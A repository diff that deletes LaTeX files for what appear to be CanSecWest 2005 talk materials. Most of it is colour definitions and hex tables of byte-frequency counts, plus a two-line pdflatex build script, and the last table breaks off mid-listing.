\color{HexyGreen}60 \color{Hexy113}71 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}70 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}80 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}90 \color{Hexy0}00 \color{Hexy137}89 \color{Hexy108}6c \color{Hexy120}78 \color{Hexy0}00 \color{Hexy116}74 \color{Hexy114}72 \color{Hexy223}df \color{Hexy122}7a \color{Hexy121}79 \color{Hexy0}00 \color{Hexy86}56 \color{Hexy130}82 \color{Hexy0}00 \color{Hexy118}76 \color{Hexy119}77
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}b0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}c0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}d0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}e0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy124}7c \color{Hexy0}00 00 \color{Hexy113}71 \color{Hexy127}7f \color{Hexy0}00 00 \color{Hexy105}69 \color{Hexy0}00 00 00
\end{semiverbatim}
}

77
dev/materials/cansecwest05/admtable2.tex
View File

@ -1,77 +0,0 @@
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy127}{rgb}{0.498,0,0.501}
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
\definecolor{Hexy123}{rgb}{0.482,0,0.517}
\definecolor{Hexy121}{rgb}{0.474,0,0.525}
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
\definecolor{Hexy117}{rgb}{0.458,0,0.541}
\definecolor{Hexy115}{rgb}{0.450,0,0.549}
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
\definecolor{Hexy88}{rgb}{0.345,0,0.654}
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
\definecolor{Hexy122}{rgb}{0.478,0,0.521}
\definecolor{Hexy108}{rgb}{0.423,0,0.576}
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
\definecolor{Hexy122}{rgb}{0.478,0,0.521}
\definecolor{Hexy126}{rgb}{0.494,0,0.505}
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
\definecolor{Hexy101}{rgb}{0.396,0,0.603}
\definecolor{Hexy117}{rgb}{0.458,0,0.541}
\definecolor{Hexy127}{rgb}{0.498,0,0.501}
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
\definecolor{Hexy123}{rgb}{0.482,0,0.517}
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
\definecolor{Hexy115}{rgb}{0.450,0,0.549}
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
\definecolor{Hexy121}{rgb}{0.474,0,0.525}
\definecolor{Hexy135}{rgb}{0.529,0,0.470}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy232}{rgb}{0.909,0,0.090}
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
\definecolor{Hexy104}{rgb}{0.407,0,0.592}
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
\definecolor{Hexy91}{rgb}{0.356,0,0.643}
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
\definecolor{Hexy117}{rgb}{0.458,0,0.541}
\definecolor{Hexy87}{rgb}{0.341,0,0.658}
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
\definecolor{Hexy0}{rgb}{0,0,0}
\definecolor{HexyGreen}{rgb}{0,.7,0}
{\footnotesize
\begin{semiverbatim}
total: 6000
uniq: 52
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
\color{HexyGreen}00 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}10 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}20 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy100}64 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy111}6f
\color{HexyGreen}30 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy120}78 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy116}74
\color{HexyGreen}40 \color{Hexy127}7f \color{Hexy107}6b \color{Hexy111}6f \color{Hexy123}7b \color{Hexy121}79 \color{Hexy114}72 \color{Hexy117}75 \color{Hexy115}73 \color{Hexy118}76 \color{Hexy88}58 \color{Hexy111}6f \color{Hexy122}7a \color{Hexy108}6c \color{Hexy120}78 \color{Hexy122}7a \color{Hexy126}7e
\color{HexyGreen}50 \color{Hexy113}71 \color{Hexy109}6d \color{Hexy101}65 \color{Hexy117}75 \color{Hexy127}7f \color{Hexy114}72 \color{Hexy123}7b \color{Hexy114}72 \color{Hexy113}71 \color{Hexy119}77 \color{Hexy109}6d \color{Hexy100}64 \color{Hexy0}00 \color{Hexy113}71 \color{Hexy124}7c \color{Hexy100}64
\color{HexyGreen}60 \color{Hexy115}73 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}70 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}80 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}90 \color{Hexy0}00 \color{Hexy107}6b \color{Hexy121}79 \color{Hexy135}87 \color{Hexy0}00 \color{Hexy116}74 74 \color{Hexy232}e8 \color{Hexy107}6b \color{Hexy104}68 \color{Hexy0}00 \color{Hexy118}76 \color{Hexy91}5b \color{Hexy0}00 \color{Hexy109}6d \color{Hexy114}72
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}b0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}c0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}d0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}e0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy117}75 \color{Hexy0}00 00 \color{Hexy87}57 \color{Hexy107}6b \color{Hexy0}00 00 \color{Hexy111}6f \color{Hexy0}00 00 00
\end{semiverbatim}
}

4
dev/materials/cansecwest05/csw05.sh
View File

@ -1,4 +0,0 @@
#!/bin/sh
for((i = 0; i < 2; i++)); do
pdflatex csw05
done

1202
dev/materials/cansecwest05/csw05.tex
View File

File diff suppressed because it is too large Load Diff

166
dev/materials/cansecwest05/optytable.tex
View File

@ -1,166 +0,0 @@
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy0}{rgb}{0,0,0}
\definecolor{HexyGreen}{rgb}{0,.7,0}
{\footnotesize
\begin{semiverbatim}
total: 6000
uniq: 141
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
\color{HexyGreen}00 \color{Hexy0}00 \color{Hexy18}12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy18}12 \color{Hexy17}11 11 11 \color{Hexy57}39 39 \color{Hexy0}00 00
\color{HexyGreen}10 \color{Hexy18}12 12 12 \color{Hexy17}11 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy18}12 12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 00
\color{HexyGreen}20 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39 \color{Hexy18}12 12 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
\color{HexyGreen}30 \color{Hexy17}11 11 \color{Hexy18}12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39 \color{Hexy17}11 11 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
\color{HexyGreen}40 \color{Hexy57}39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 39 39 39 39 39 \color{Hexy0}00 00 \color{Hexy57}39 \color{Hexy58}3a
\color{HexyGreen}50 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}60 \color{Hexy0}00 00 00 00 00 00 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy0}00 \color{Hexy17}11 \color{Hexy0}00 00 00 00
\color{HexyGreen}70 \color{Hexy58}3a \color{Hexy57}39 39 39 39 39 39 39 39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 39
\color{HexyGreen}80 \color{Hexy18}12 12 \color{Hexy0}00 \color{Hexy18}12 12 \color{Hexy17}11 11 \color{Hexy18}12 12 12 \color{Hexy0}00 00 00 00 00 00
\color{HexyGreen}90 \color{Hexy57}39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 39 39 39 \color{Hexy0}00 \color{Hexy57}39 \color{Hexy0}00 00 00 \color{Hexy57}39
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 \color{Hexy58}3a \color{Hexy57}39 \color{Hexy0}00 00 00 00 00 00
\color{HexyGreen}b0 \color{Hexy58}3a \color{Hexy57}39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 39 39 39 39 \color{Hexy0}00 00 \color{Hexy58}3a \color{Hexy57}39
\color{HexyGreen}c0 \color{Hexy18}12 12 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}d0 \color{Hexy18}12 12 12 \color{Hexy17}11 \color{Hexy57}39 39 39 \color{Hexy0}00 00 00 00 00 00 00 00 00
\color{HexyGreen}e0 \color{Hexy57}39 39 39 39 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy57}39 \color{Hexy0}00 00 00 00
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy57}39 \color{Hexy17}11 11 \color{Hexy58}3a \color{Hexy57}39 \color{Hexy0}00 00 \color{Hexy57}39 39 \color{Hexy17}11 11
\end{semiverbatim}
}

166
dev/materials/cansecwest05/optytable2.tex
View File

@ -1,166 +0,0 @@
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy16}{rgb}{0.062,0,0.937}
\definecolor{Hexy16}{rgb}{0.062,0,0.937}
\definecolor{Hexy0}{rgb}{0,0,0}
\definecolor{HexyGreen}{rgb}{0,.7,0}
{\footnotesize
\begin{semiverbatim}
total: 6000
uniq: 141
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
\color{HexyGreen}00 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy17}11 11 \color{Hexy57}39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy17}11 \color{Hexy18}12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 00
\color{HexyGreen}10 \color{Hexy17}11 11 11 11 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy17}11 11 \color{Hexy57}39 39 \color{Hexy0}00 00
\color{HexyGreen}20 \color{Hexy18}12 12 12 12 \color{Hexy57}39 \color{Hexy58}3a \color{Hexy0}00 \color{Hexy58}3a \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
\color{HexyGreen}30 \color{Hexy17}11 \color{Hexy18}12 12 \color{Hexy17}11 \color{Hexy57}39 \color{Hexy58}3a \color{Hexy0}00 \color{Hexy58}3a \color{Hexy18}12 12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
\color{HexyGreen}40 \color{Hexy57}39 \color{Hexy58}3a 3a \color{Hexy57}39 \color{Hexy0}00 00 \color{Hexy57}39 39 39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 39
\color{HexyGreen}50 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}60 \color{Hexy0}00 00 00 00 00 00 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy0}00 \color{Hexy17}11 \color{Hexy0}00 00 00 00
